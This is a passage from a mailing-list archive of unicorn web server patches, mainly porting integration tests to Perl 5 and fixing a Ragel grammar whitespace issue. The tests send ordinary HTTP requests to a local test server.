   [ 200, h, [ dig.hexdigest ] ]
 end
 
+class NoArray
+  def each
+    yield "HI\n"
+  end
+end
+
 run(lambda do |env|
   case env['REQUEST_METHOD']
   when 'GET'
@@ -98,6 +104,7 @@ def rack_input_tests(env)
     when '/pid'; [ 200, {}, [ "#$$\n" ] ]
     when '/early_hints_rack2'; early_hints(env, "r\n2")
     when '/early_hints_rack3'; early_hints(env, %w(r 3))
+    when '/no-ary'; [ 200, {}, NoArray.new ]
     else '/'; [ 200, {}, [ env_dump(env) ] ]
     end # case PATH_INFO (GET)
   when 'POST'
diff --git a/t/integration.t b/t/integration.t
index bb2ab51..115a761 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -22,6 +22,13 @@ my $ar = unicorn(qw(-E none t/integration.ru -c), $conf, { 3 => $srv });
 my $curl = which('curl');
 my $fifo = "$tmpdir/fifo";
 POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
+my $wait_fifo = sub {
+	open my $fifo_fh, '<', $fifo;
+	my $wpid = readline($fifo_fh);
+	like($wpid, qr/\Apid=\d+\z/a , 'new worker ready');
+	$wpid;
+};
+
 my %PUT = (
 	chunked_md5 => sub {
 		my ($in, $out, $path, %opt) = @_;
@@ -176,6 +183,78 @@ if ('bad requests') {
 	like($status, qr!\AHTTP/1\.[01] 414 \b!, '414 on FRAGMENT > (1024)');
 }
 
+my $tmp = { 3 => tcp_server() };
+my $no_ary = "GET /no-ary HTTP/1.1\r\nHost: example.com\r\n\r\n";
+if (diag('chunk_response is off by default w/ RACK_ENV=none') || 1) {
+	print { $c = tcp_start($srv) } $no_ary;
+	($status, $hdr) = slurp_hdr($c);
+	unlike("@$hdr", qr/Transfer-Encoding/i,
+		'no Transfer-Encoding for RACK_ENV=none despite HTTP/1.1');
+	local $/;
+	is(readline($c), "HI\n", 'unchunked body response');
+}
+
+# pretend we have Rack::Chunked for RACK_ENV=(deployment|development)
+for my $rack_env (qw(deployment development)) {
+	my $cfg = "$tmpdir/nochunk.conf.rb";
+	open my $fh, '>', $cfg;
+	my $u = unicorn('-E', $rack_env, qw(t/integration.ru -c), $cfg, $tmp);
+	$c = tcp_start($tmp->{3});
+	print $c $no_ary;
+	($status, $hdr) = slurp_hdr($c);
+	like("@$hdr", qr/Transfer-Encoding/i,
+		"Transfer-Encoding set by default for RACK_ENV=$rack_env");
+	is(do { local $/; readline($c) },
+		"3\r\nHI\n\r\n0\r\n\r\n", 'chunked body response');
+
+	print $fh <<EOM;
+chunk_response false
+after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+	close $fh;
+	$u->do_kill('HUP');
+	$wait_fifo->();
+	$c = tcp_start($tmp->{3});
+	print $c $no_ary;
+	($status, $hdr) = slurp_hdr($c);
+	unlike("@$hdr", qr/Transfer-Encoding/i,
+			"RACK_ENV=$rack_env w/o chunk_response");
+	is(do { local $/; readline($c) },
+		"HI\n", 'unchunked body response');
+}
+
+if (diag('chunk_response true w/ RACK_ENV=none') || 1) {
+	my $cfg = "$tmpdir/chunk.conf.rb";
+	open my $fh, '>', $cfg;
+	print $fh "chunk_response true\n";
+	close $fh;
+	my $u = unicorn(qw(-E none t/integration.ru -c), $cfg, $tmp);
+	$c = tcp_start($tmp->{3});
+	print $c $no_ary;
+	($status, $hdr) = slurp_hdr($c);
+	like("@$hdr", qr/Transfer-Encoding/i,
+		"Transfer-Encoding set by chunk_response false");
+	is(do { local $/; readline($c) },
+		"3\r\nHI\n\r\n0\r\n\r\n", 'chunked body response');
+
+	# reset to default:
+	open $fh, '>', $cfg;
+	print $fh <<EOM;
+after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+	close $fh;
+	$u->do_kill('HUP');
+	$wait_fifo->();
+
+	$c = tcp_start($tmp->{3});
+	print $c $no_ary;
+	($status, $hdr) = slurp_hdr($c);
+	unlike("@$hdr", qr/Transfer-Encoding/i,
+			'chunk_response false after HUP reset');
+	is(do { local $/; readline($c) },
+		"HI\n", 'unchunked body response after HUP reset');
+}
+
 # input tests
 my ($blob_size, $blob_hash);
 SKIP: {
@@ -287,9 +366,7 @@ check_client_connection true
 after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
 EOM
 	$ar->do_kill('HUP');
-	open my $fifo_fh, '<', $fifo;
-	my $wpid = readline($fifo_fh);
-	like($wpid, qr/\Apid=\d+\z/a , 'new worker ready');
+	$wait_fifo->();
 	$ck_early_hints->('ccc on');
 }
 
@@ -301,10 +378,7 @@ if ('max_header_len internal API') {
 Unicorn::HttpParser.max_header_len = $len
 EOM
 	$ar->do_kill('HUP');
-	open my $fifo_fh, '<', $fifo;
-	my $wpid = readline($fifo_fh);
-	like($wpid, qr/\Apid=\d+\z/a , 'new worker ready');
-	close $fifo_fh;
+	my $wpid = $wait_fifo->();
 	$wpid =~ s/\Apid=// or die;
 	ok(CORE::kill(0, $wpid), 'worker PID retrieved');
 

^ permalink raw reply related	[relevance 1%]

* [PATCH] unicorn_http_common.rl: use only ASCII spaces for compatibility
@ 2023-06-20 10:46  3% EW
  0 siblings, 0 replies; 200+ results
From: EW @ 2023-06-20 10:46 UTC (permalink / raw)
  To: unicorn-public

Ragel 6.10 on FreeBSD 12.4 amd64 complains and fails on this, yet the same
Ragel version on Debian 11.x i386 and amd64 never has.  I suspect this can
fix compatibility on s390x, arm64, armel, and armhf Debian builds:

https://buildd.debian.org/status/fetch.php?pkg=unicorn&arch=s390x&ver=6.1.0-1&stamp=1687156375&file=log
https://buildd.debian.org/status/fetch.php?pkg=unicorn&arch=arm64&ver=6.1.0-1&stamp=1687156478&file=log
https://buildd.debian.org/status/fetch.php?pkg=unicorn&arch=armel&ver=6.1.0-1&stamp=1687156619&file=log
https://buildd.debian.org/status/fetch.php?pkg=unicorn&arch=armhf&ver=6.1.0-1&stamp=1687156807&file=log

Fixes: d5fbbf547203061b (Add some tolerance (RFC2616 sec. 19.3), 2016-10-20)
---
 ext/unicorn_http/unicorn_http_common.rl | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/ext/unicorn_http/unicorn_http_common.rl b/ext/unicorn_http/unicorn_http_common.rl
index 0988b54..507e570 100644
--- a/ext/unicorn_http/unicorn_http_common.rl
+++ b/ext/unicorn_http/unicorn_http_common.rl
@@ -4,7 +4,7 @@
 
 #### HTTP PROTOCOL GRAMMAR
 # line endings
-  CRLF = ("\r\n" | "\n");
+  CRLF = ("\r\n" | "\n");
 
 # character types
   CTL = (cntrl | 127);

^ permalink raw reply related	[relevance 3%]

* [PATCH 00-23/23] start porting tests to Perl5
@ 2023-06-05 10:32  1% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2023-06-05 10:32 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 4179 bytes --]

Still a lot more work to do, but at least socat is no longer a
test dependency.  Perl5 is installed on far more systems than
socat.

Ruby introduces breaking changes every year and I can't trust
tests to work as they were originally intended, anymore.
Perl 5 doesn't have perfect backwards compatibility, either; but
it's the least bad of any widely-installed scripting language.

Note: that 23/23 introduces a subtle bugfix which changes
behavior for systemd users

Patches are attached to reduce load on SMTP servers.
Some more patches to come as I deal with Ruby 3.x deprecation
warnings :<

Eric Wong (23):
  switch unit/test_response.rb to Perl 5 integration test
  support rack 3 multi-value headers
  port t0018-write-on-close.sh to Perl 5
  port t0000-http-basic.sh to Perl 5
  port t0002-parser-error.sh to Perl 5
  t/integration.t: use start_req to simplify test slighly
  port t0011-active-unix-socket.sh to Perl 5
  port t0100-rack-input-tests.sh to Perl 5
  tests: use autodie to simplify error checking
  port t0019-max_header_len.sh to Perl 5
  test_exec: drop sd_listen_fds emulation test
  test_exec: drop test_basic and test_config_ru_alt_path
  tests: check_stderr consistently in Perl 5 tests
  tests: consistent tcp_start and unix_start across Perl 5 tests
  port t9000-preread-input.sh to Perl 5
  port t/t0116-client_body_buffer_size.sh to Perl 5
  tests: get rid of sha1sum.rb and rsha1() sh function
  early_hints supports Rack 3 array headers
  test_server: drop early_hints test
  t/integration.t: switch PUT tests to MD5, reuse buffers
  tests: move test_upload.rb tests to t/integration.t
  drop redundant IO#close_on_exec=false calls
  LISTEN_FDS-inherited sockets are immortal across SIGHUP

 GNUmakefile                                |   7 +-
 lib/unicorn/http_server.rb                 |  12 +-
 t/README                                   |  21 +-
 t/active-unix-socket.t                     | 113 +++++++
 t/bin/content-md5-put                      |  36 ---
 t/bin/sha1sum.rb                           |  17 --
 t/{t0116.ru => client_body_buffer_size.ru} |   2 -
 t/client_body_buffer_size.t                |  82 ++++++
 t/integration.ru                           | 114 +++++++
 t/integration.t                            | 326 +++++++++++++++++++++
 t/lib.perl                                 | 217 ++++++++++++++
 t/preread_input.ru                         |  21 +-
 t/rack-input-tests.ru                      |  21 --
 t/t0000-http-basic.sh                      |  50 ----
 t/t0002-parser-error.sh                    |  94 ------
 t/t0011-active-unix-socket.sh              |  79 -----
 t/t0018-write-on-close.sh                  |  23 --
 t/t0019-max_header_len.sh                  |  49 ----
 t/t0100-rack-input-tests.sh                | 124 --------
 t/t0116-client_body_buffer_size.sh         |  80 -----
 t/t9000-preread-input.sh                   |  48 ---
 t/test-lib.sh                              |   4 -
 t/write-on-close.ru                        |  11 -
 test/exec/test_exec.rb                     |  57 ----
 test/unit/test_response.rb                 | 111 -------
 test/unit/test_server.rb                   |  31 --
 test/unit/test_upload.rb                   | 301 -------------------
 27 files changed, 891 insertions(+), 1160 deletions(-)
 create mode 100644 t/active-unix-socket.t
 delete mode 100755 t/bin/content-md5-put
 delete mode 100755 t/bin/sha1sum.rb
 rename t/{t0116.ru => client_body_buffer_size.ru} (82%)
 create mode 100644 t/client_body_buffer_size.t
 create mode 100644 t/integration.ru
 create mode 100644 t/integration.t
 create mode 100644 t/lib.perl
 delete mode 100644 t/rack-input-tests.ru
 delete mode 100755 t/t0000-http-basic.sh
 delete mode 100755 t/t0002-parser-error.sh
 delete mode 100755 t/t0011-active-unix-socket.sh
 delete mode 100755 t/t0018-write-on-close.sh
 delete mode 100755 t/t0019-max_header_len.sh
 delete mode 100755 t/t0100-rack-input-tests.sh
 delete mode 100755 t/t0116-client_body_buffer_size.sh
 delete mode 100755 t/t9000-preread-input.sh
 delete mode 100644 t/write-on-close.ru
 delete mode 100644 test/unit/test_response.rb
 delete mode 100644 test/unit/test_upload.rb

[-- Attachment #2: 0001-switch-unit-test_response.rb-to-Perl-5-integration-t.patch --]
[-- Type: text/x-diff, Size: 15667 bytes --]

From 086e397abc0126556af24df77a976671294df2ee Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:30 +0000
Subject: [PATCH 01/23] switch unit/test_response.rb to Perl 5 integration test

http_response_write may benefit from API changes for Rack 3
support.

Since there's no benefit I can see from using a unit test,
switch to an integration test to avoid having to maintain the
unit test if our internal http_response_write method changes.

Of course, I can't trust tests written in Ruby since I've had to
put up with a constant stream of incompatibilities over the past
two decades :<   Perl is more widely installed than socat[1], and
nearly all the Perl I wrote 20 years ago still works
unmodified today.

[1] the rarest dependency of the Bourne shell integration tests
---
 GNUmakefile                |   5 +-
 t/README                   |  24 +++--
 t/integration.ru           |  38 ++++++++
 t/integration.t            |  64 +++++++++++++
 t/lib.perl                 | 189 +++++++++++++++++++++++++++++++++++++
 test/unit/test_response.rb | 111 ----------------------
 6 files changed, 313 insertions(+), 118 deletions(-)
 create mode 100644 t/integration.ru
 create mode 100644 t/integration.t
 create mode 100644 t/lib.perl
 delete mode 100644 test/unit/test_response.rb

diff --git a/GNUmakefile b/GNUmakefile
index 0e08ef0..5cca189 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -86,7 +86,7 @@ $(tmp_bin)/%: bin/% | $(tmp_bin)
 bins: $(tmp_bins)
 
 t_log := $(T_log) $(T_n_log)
-test: $(T) $(T_n)
+test: $(T) $(T_n) test-prove
 	@cat $(t_log) | $(MRI) test/aggregate.rb
 	@$(RM) $(t_log)
 
@@ -141,6 +141,9 @@ t/random_blob:
 
 test-integration: $(T_sh)
 
+test-prove:
+	prove -vw
+
 check: test-require test test-integration
 test-all: check
 
diff --git a/t/README b/t/README
index 14de559..8a5243e 100644
--- a/t/README
+++ b/t/README
@@ -5,16 +5,24 @@ TCP ports or Unix domain sockets.  They're all designed to run
 concurrently with other tests to minimize test time, but tests may be
 run independently as well.
 
-We write our tests in Bourne shell because that's what we're
-comfortable writing integration tests with.
+New tests are written in Perl 5 because we need a stable language
+to test real-world behavior and Ruby introduces incompatibilities
+at a far faster rate than Perl 5.  Perl is Ruby's older cousin, so
+it should be easy-to-learn for Rubyists.
+
+Old tests are in Bourne shell, but the socat(1) dependency was probably
+too rare compared to Perl 5.
 
 == Requirements
 
-* {Ruby 2.0.0+}[https://www.ruby-lang.org/en/] (duh!)
+* {Ruby 2.0.0+}[https://www.ruby-lang.org/en/]
+* {Perl 5.14+}[https://www.perl.org/] # your distro should have it
 * {GNU make}[https://www.gnu.org/software/make/]
+
+The following requirements will eventually be dropped.
+
 * {socat}[http://www.dest-unreach.org/socat/]
 * {curl}[https://curl.haxx.se/]
-* standard UNIX shell utilities (Bourne sh, awk, sed, grep, ...)
 
 We do not use bashisms or any non-portable, non-POSIX constructs
 in our shell code.  We use the "pipefail" option if available and
@@ -26,9 +34,13 @@ with {dash}[http://gondor.apana.org.au/~herbert/dash/] and
 
 To run the entire test suite with 8 tests running at once:
 
-  make -j8
+  make -j8 && prove -vw
+
+To run one individual test (Perl5):
+
+  prove -vw t/integration.t
 
-To run one individual test:
+To run one individual test (shell):
 
   make t0000-simple-http.sh
 
diff --git a/t/integration.ru b/t/integration.ru
new file mode 100644
index 0000000..6ef873c
--- /dev/null
+++ b/t/integration.ru
@@ -0,0 +1,38 @@
+#!ruby
+# Copyright (C) unicorn hackers <unicorn-public@80x24.org>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+
+# this goes for t/integration.t  We'll try to put as many tests
+# in here as possible to avoid startup overhead of Ruby.
+
+$orig_rack_200 = nil
+def tweak_status_code
+  $orig_rack_200 = Rack::Utils::HTTP_STATUS_CODES[200]
+  Rack::Utils::HTTP_STATUS_CODES[200] = "HI"
+  [ 200, {}, [] ]
+end
+
+def restore_status_code
+  $orig_rack_200 or return [ 500, {}, [] ]
+  Rack::Utils::HTTP_STATUS_CODES[200] = $orig_rack_200
+  [ 200, {}, [] ]
+end
+
+run(lambda do |env|
+  case env['REQUEST_METHOD']
+  when 'GET'
+    case env['PATH_INFO']
+    when '/rack-2-newline-headers'; [ 200, { 'X-R2' => "a\nb\nc" }, [] ]
+    when '/nil-header-value'; [ 200, { 'X-Nil' => nil }, [] ]
+    when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
+    end # case PATH_INFO (GET)
+  when 'POST'
+    case env['PATH_INFO']
+    when '/tweak-status-code'; tweak_status_code
+    when '/restore-status-code'; restore_status_code
+    end # case PATH_INFO (POST)
+    # ...
+  when 'PUT'
+    # ...
+  end # case REQUEST_METHOD
+end) # run
diff --git a/t/integration.t b/t/integration.t
new file mode 100644
index 0000000..5569155
--- /dev/null
+++ b/t/integration.t
@@ -0,0 +1,64 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+
+use v5.14; BEGIN { require './t/lib.perl' };
+my $srv = tcp_server();
+my $t0 = time;
+my $ar = unicorn(qw(-E none t/integration.ru), { 3 => $srv });
+
+sub slurp_hdr {
+	my ($c) = @_;
+	local $/ = "\r\n\r\n"; # affects both readline+chomp
+	chomp(my $hdr = readline($c));
+	my ($status, @hdr) = split(/\r\n/, $hdr);
+	diag explain([ $status, \@hdr ]) if $ENV{V};
+	($status, \@hdr);
+}
+
+my ($c, $status, $hdr);
+
+# response header tests
+$c = tcp_connect($srv);
+print $c "GET /rack-2-newline-headers HTTP/1.0\r\n\r\n" or die $!;
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+my $orig_200_status = $status;
+is_deeply([ grep(/^X-R2: /, @$hdr) ],
+	[ 'X-R2: a', 'X-R2: b', 'X-R2: c' ],
+	'rack 2 LF-delimited headers supported') or diag(explain($hdr));
+
+SKIP: { # Date header check
+	my @d = grep(/^Date: /i, @$hdr);
+	is(scalar(@d), 1, 'got one date header') or diag(explain(\@d));
+	eval { require HTTP::Date } or skip "HTTP::Date missing: $@", 1;
+	$d[0] =~ s/^Date: //i or die 'BUG: did not strip date: prefix';
+	my $t = HTTP::Date::str2time($d[0]);
+	ok($t >= $t0 && $t > 0 && $t <= time, 'valid date') or
+		diag(explain([$t, $!, \@d]));
+};
+
+# cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
+$c = tcp_connect($srv);
+print $c "GET /nil-header-value HTTP/1.0\r\n\r\n" or die $!;
+($status, $hdr) = slurp_hdr($c);
+is_deeply([grep(/^X-Nil:/, @$hdr)], ['X-Nil: '],
+	'nil header value accepted for broken apps') or diag(explain($hdr));
+
+if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
+	$c = tcp_connect($srv);
+	print $c "POST /tweak-status-code HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 200 HI\b!, 'status tweaked');
+
+	$c = tcp_connect($srv);
+	print $c "POST /restore-status-code HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	is($status, $orig_200_status, 'original status restored');
+}
+
+
+# ... more stuff here
+undef $ar;
+diag slurp("$tmpdir/err.log") if $ENV{V};
+done_testing;
diff --git a/t/lib.perl b/t/lib.perl
new file mode 100644
index 0000000..dd9c6b7
--- /dev/null
+++ b/t/lib.perl
@@ -0,0 +1,189 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@80x24.org>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+package UnicornTest;
+use v5.14;
+use parent qw(Exporter);
+use Test::More;
+use IO::Socket::INET;
+use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
+use File::Temp 0.19 (); # 0.19 for ->newdir
+our ($tmpdir, $errfh);
+our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
+	SEEK_SET);
+
+my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
+$tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
+open($errfh, '>>', "$tmpdir/err.log") or die "open: $!";
+
+sub tcp_server {
+	my %opt = (
+		ReuseAddr => 1,
+		Proto => 'tcp',
+		Type => SOCK_STREAM,
+		Listen => SOMAXCONN,
+		Blocking => 0,
+		@_,
+	);
+	eval {
+		die 'IPv4-only' if $ENV{TEST_IPV4_ONLY};
+		require IO::Socket::INET6;
+		IO::Socket::INET6->new(%opt, LocalAddr => '[::1]')
+	} || eval {
+		die 'IPv6-only' if $ENV{TEST_IPV6_ONLY};
+		IO::Socket::INET->new(%opt, LocalAddr => '127.0.0.1')
+	} || BAIL_OUT "failed to create TCP server: $! ($@)";
+}
+
+sub tcp_host_port {
+	my ($s) = @_;
+	my ($h, $p) = ($s->sockhost, $s->sockport);
+	my $ipv4 = $s->sockdomain == AF_INET;
+	if (wantarray) {
+		$ipv4 ? ($h, $p) : ("[$h]", $p);
+	} else {
+		$ipv4 ? "$h:$p" : "[$h]:$p";
+	}
+}
+
+sub tcp_connect {
+	my ($dest, %opt) = @_;
+	my $addr = tcp_host_port($dest);
+	my $s = ref($dest)->new(
+		Proto => 'tcp',
+		Type => SOCK_STREAM,
+		PeerAddr => $addr,
+		%opt,
+	) or BAIL_OUT "failed to connect to $addr: $!";
+	$s->autoflush(1);
+	$s;
+}
+
+sub slurp {
+	open my $fh, '<', $_[0] or die "open($_[0]): $!";
+	local $/;
+	<$fh>;
+}
+
+sub spawn {
+	my $env = ref($_[0]) eq 'HASH' ? shift : undef;
+	my $opt = ref($_[-1]) eq 'HASH' ? pop : {};
+	my @cmd = @_;
+	my $old = POSIX::SigSet->new;
+	my $set = POSIX::SigSet->new;
+	$set->fillset or die "sigfillset: $!";
+	sigprocmask(SIG_SETMASK, $set, $old) or die "SIG_SETMASK: $!";
+	pipe(my ($r, $w)) or die "pipe: $!";
+	my $pid = fork // die "fork: $!";
+	if ($pid == 0) {
+		close $r;
+		$SIG{__DIE__} = sub {
+			warn(@_);
+			syswrite($w, my $num = $! + 0);
+			_exit(1);
+		};
+
+		# pretend to be systemd (cf. sd_listen_fds(3))
+		my $cfd;
+		for ($cfd = 0; ($cfd < 3) || defined($opt->{$cfd}); $cfd++) {
+			my $io = $opt->{$cfd} // next;
+			my $pfd = fileno($io) // die "fileno($io): $!";
+			if ($pfd == $cfd) {
+				fcntl($io, F_SETFD, 0) // die "F_SETFD: $!";
+			} else {
+				dup2($pfd, $cfd) // die "dup2($pfd, $cfd): $!";
+			}
+		}
+		if (($cfd - 3) > 0) {
+			$env->{LISTEN_PID} = $$;
+			$env->{LISTEN_FDS} = $cfd - 3;
+		}
+
+		if (defined(my $pgid = $opt->{pgid})) {
+			setpgid(0, $pgid) // die "setpgid(0, $pgid): $!";
+		}
+		$SIG{$_} = 'DEFAULT' for grep(!/^__/, keys %SIG);
+		if (defined(my $cd = $opt->{-C})) {
+			chdir $cd // die "chdir($cd): $!";
+		}
+		$old->delset(POSIX::SIGCHLD) or die "sigdelset CHLD: $!";
+		sigprocmask(SIG_SETMASK, $old) or die "SIG_SETMASK: ~CHLD: $!";
+		@ENV{keys %$env} = values(%$env) if $env;
+		exec { $cmd[0] } @cmd;
+		die "exec @cmd: $!";
+	}
+	close $w;
+	sigprocmask(SIG_SETMASK, $old) or die "SIG_SETMASK(old): $!";
+	if (my $cerrnum = do { local $/, <$r> }) {
+		$! = $cerrnum;
+		die "@cmd PID=$pid died: $!";
+	}
+	$pid;
+}
+
+sub which {
+	my ($file) = @_;
+	return $file if index($file, '/') >= 0;
+	for my $p (split(/:/, $ENV{PATH})) {
+		$p .= "/$file";
+		return $p if -x $p;
+	}
+	undef;
+}
+
+# returns an AutoReap object
+sub unicorn {
+	my %env;
+	if (ref($_[0]) eq 'HASH') {
+		my $e = shift;
+		%env = %$e;
+	}
+	my @args = @_;
+	push(@args, {}) if ref($args[-1]) ne 'HASH';
+	$args[-1]->{2} //= $errfh; # stderr default
+
+	state $ruby = which($ENV{RUBY} // 'ruby');
+	state $lib = File::Spec->rel2abs('lib');
+	state $ver = $ENV{TEST_RUBY_VERSION} // `$ruby -e 'print RUBY_VERSION'`;
+	state $eng = $ENV{TEST_RUBY_ENGINE} // `$ruby -e 'print RUBY_ENGINE'`;
+	state $ext = File::Spec->rel2abs("test/$eng-$ver/ext/unicorn_http");
+	state $exe = File::Spec->rel2abs('bin/unicorn');
+	my $pid = spawn(\%env, $ruby, '-I', $lib, '-I', $ext, $exe, @args);
+	UnicornTest::AutoReap->new($pid);
+}
+
+# automatically kill + reap children when this goes out-of-scope
+package UnicornTest::AutoReap;
+use v5.14;
+
+sub new {
+	my (undef, $pid) = @_;
+	bless { pid => $pid, owner => $$ }, __PACKAGE__
+}
+
+sub kill {
+	my ($self, $sig) = @_;
+	CORE::kill($sig // 'TERM', $self->{pid});
+}
+
+sub join {
+	my ($self, $sig) = @_;
+	my $pid = delete $self->{pid} or return;
+	CORE::kill($sig, $pid) if defined $sig;
+	my $ret = waitpid($pid, 0) // die "waitpid($pid): $!";
+	$ret == $pid or die "BUG: waitpid($pid) != $ret";
+}
+
+sub DESTROY {
+	my ($self) = @_;
+	return if $self->{owner} != $$;
+	$self->join('TERM');
+}
+
+package main; # inject ourselves into the t/*.t script
+UnicornTest->import;
+Test::More->import;
+# try to ensure ->DESTROY fires:
+$SIG{TERM} = sub { exit(15 + 128) };
+$SIG{INT} = sub { exit(2 + 128) };
+1;
diff --git a/test/unit/test_response.rb b/test/unit/test_response.rb
deleted file mode 100644
index fbe433f..0000000
--- a/test/unit/test_response.rb
+++ /dev/null
@@ -1,111 +0,0 @@
-# -*- encoding: binary -*-
-
-# Copyright (c) 2005 Zed A. Shaw
-# You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv2+ (GPLv3+ preferred)
-#
-# Additional work donated by contributors.  See git history
-# for more information.
-
-require './test/test_helper'
-require 'time'
-
-include Unicorn
-
-class ResponseTest < Test::Unit::TestCase
-  include Unicorn::HttpResponse
-
-  def test_httpdate
-    before = Time.now.to_i - 1
-    str = httpdate
-    assert_kind_of(String, str)
-    middle = Time.parse(str).to_i
-    after = Time.now.to_i
-    assert before <= middle
-    assert middle <= after
-  end
-
-  def test_response_headers
-    out = StringIO.new
-    http_response_write(out, 200, {"X-Whatever" => "stuff"}, ["cool"])
-    assert ! out.closed?
-
-    assert out.length > 0, "output didn't have data"
-  end
-
-  # ref: <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
-  def test_response_header_broken_nil
-    out = StringIO.new
-    http_response_write(out, 200, {"Nil" => nil}, %w(hysterical raisin))
-    assert ! out.closed?
-
-    assert_match %r{^Nil: \r\n}sm, out.string, 'nil accepted'
-  end
-
-  def test_response_string_status
-    out = StringIO.new
-    http_response_write(out,'200', {}, [])
-    assert ! out.closed?
-    assert out.length > 0, "output didn't have data"
-  end
-
-  def test_response_200
-    io = StringIO.new
-    http_response_write(io, 200, {}, [])
-    assert ! io.closed?
-    assert io.length > 0, "output didn't have data"
-  end
-
-  def test_response_with_default_reason
-    code = 400
-    io = StringIO.new
-    http_response_write(io, code, {}, [])
-    assert ! io.closed?
-    lines = io.string.split(/\r\n/)
-    assert_match(/.* Bad Request$/, lines.first,
-                 "wrong default reason phrase")
-  end
-
-  def test_rack_multivalue_headers
-    out = StringIO.new
-    http_response_write(out,200, {"X-Whatever" => "stuff\nbleh"}, [])
-    assert ! out.closed?
-    assert_match(/^X-Whatever: stuff\r\nX-Whatever: bleh\r\n/, out.string)
-  end
-
-  # Even though Rack explicitly forbids "Status" in the header hash,
-  # some broken clients still rely on it
-  def test_status_header_added
-    out = StringIO.new
-    http_response_write(out,200, {"X-Whatever" => "stuff"}, [])
-    assert ! out.closed?
-  end
-
-  def test_unknown_status_pass_through
-    out = StringIO.new
-    http_response_write(out,"666 I AM THE BEAST", {}, [] )
-    assert ! out.closed?
-    headers = out.string.split(/\r\n\r\n/).first.split(/\r\n/)
-    assert %r{\AHTTP/\d\.\d 666 I AM THE BEAST\z}.match(headers[0])
-  end
-
-  def test_modified_rack_http_status_codes_late
-    r, w = IO.pipe
-    pid = fork do
-      r.close
-      # Users may want to globally override the status text associated
-      # with an HTTP status code in their app.
-      Rack::Utils::HTTP_STATUS_CODES[200] = "HI"
-      http_response_write(w, 200, {}, [])
-      w.close
-    end
-    w.close
-    assert_equal "HTTP/1.1 200 HI\r\n", r.gets
-    r.read # just drain the pipe
-    pid, status = Process.waitpid2(pid)
-    assert status.success?, status.inspect
-  ensure
-    r.close
-    w.close unless w.closed?
-  end
-end

[-- Attachment #3: 0002-support-rack-3-multi-value-headers.patch --]
[-- Type: text/x-diff, Size: 1710 bytes --]

From ea0559c700fa029044464de4bd572662c10b7273 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:31 +0000
Subject: [PATCH 02/23] support rack 3 multi-value headers

The first step in adding Rack 3 support.  Rack supports
multi-value headers via array rather than newlines.

Tested-by: Martin Posthumus <martin.posthumus@gmail.com>
Link: https://yhbt.net/unicorn-public/7c851d8a-bc57-7df8-3240-2f5ab831c47c@gmail.com/
---
 t/integration.ru | 1 +
 t/integration.t  | 9 +++++++++
 2 files changed, 10 insertions(+)

diff --git a/t/integration.ru b/t/integration.ru
index 6ef873c..5183217 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -23,6 +23,7 @@ def restore_status_code
   when 'GET'
     case env['PATH_INFO']
     when '/rack-2-newline-headers'; [ 200, { 'X-R2' => "a\nb\nc" }, [] ]
+    when '/rack-3-array-headers'; [ 200, { 'x-r3' => %w(a b c) }, [] ]
     when '/nil-header-value'; [ 200, { 'X-Nil' => nil }, [] ]
     when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
     end # case PATH_INFO (GET)
diff --git a/t/integration.t b/t/integration.t
index 5569155..e876c71 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -38,6 +38,15 @@ SKIP: { # Date header check
 		diag(explain([$t, $!, \@d]));
 };
 
+
+$c = tcp_connect($srv);
+print $c "GET /rack-3-array-headers HTTP/1.0\r\n\r\n" or die $!;
+($status, $hdr) = slurp_hdr($c);
+is_deeply([ grep(/^x-r3: /, @$hdr) ],
+	[ 'x-r3: a', 'x-r3: b', 'x-r3: c' ],
+	'rack 3 array headers supported') or diag(explain($hdr));
+
+
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
 $c = tcp_connect($srv);
 print $c "GET /nil-header-value HTTP/1.0\r\n\r\n" or die $!;

[-- Attachment #4: 0003-port-t0018-write-on-close.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 4091 bytes --]

From 295a6c616f8840bc04617a377c04c3422aeebddc Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
